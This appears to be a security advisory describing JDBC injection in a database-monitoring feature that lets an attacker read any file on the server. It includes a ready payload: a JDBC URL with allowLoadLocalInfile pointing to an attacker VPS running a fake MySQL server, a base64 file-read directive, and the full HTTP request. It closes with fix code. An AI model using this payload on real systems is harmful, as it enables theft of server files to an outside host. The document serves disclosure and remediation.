Read any file in the background

[an5er]

Summary

JDBC Injection in Database Monitoring. Allow users to read any file

Details

Allowing custom URLs in select database monitoring leads us to use arbitrary parameters to cause files to be read
Use the following tool https://github.com/4ra1n/mysql-fake-server
Execute java -jar fake-mysql-cli-0.0.4.jar on vps
Select edit database and put the following payload into the url

jdbc:mysql://vps-ip:3308/test?allowLoadLocalInfile=true
base64ZmlsZXJlYWRfRDpcYW41ZXJcZmxhZy50eHQ=

POST /api/database/testConnect HTTP/1.1

{"id":"c4f72159fd87484a90d33c4a7a8619d1","name":"数据库","jdbcUrl":"jdbc:mysql://xxxx:3308/test?allowLoadLocalInfile=true","userName":"base64ZmlsZXJlYWRfRDpcYW41ZXJcZmxhZy50eHQ=","pwd":"root","createBy":"admin","createTime":"2023-12-27 10:51:22","updateBy":"admin","updateTime":"2023-12-27 10:51:22"}

Then click Test to send the request and our tool will output the following message
At the same time, the directory where we start the tool generates the ./fake-server-files directory, which contains the contents of the files we read

Impact

It allows an attacker to read any file on the server, including sensitive information, leading to data leakage and serious security threats

Fix sample code:

Properties properties = new Properties();
properties.setProperty("allowLoadLocalInfile","false");
properties.setProperty("allowLoadLocalInfileInPath","");
Connection conn = DriverManager.getConnection(DB_URL,properties);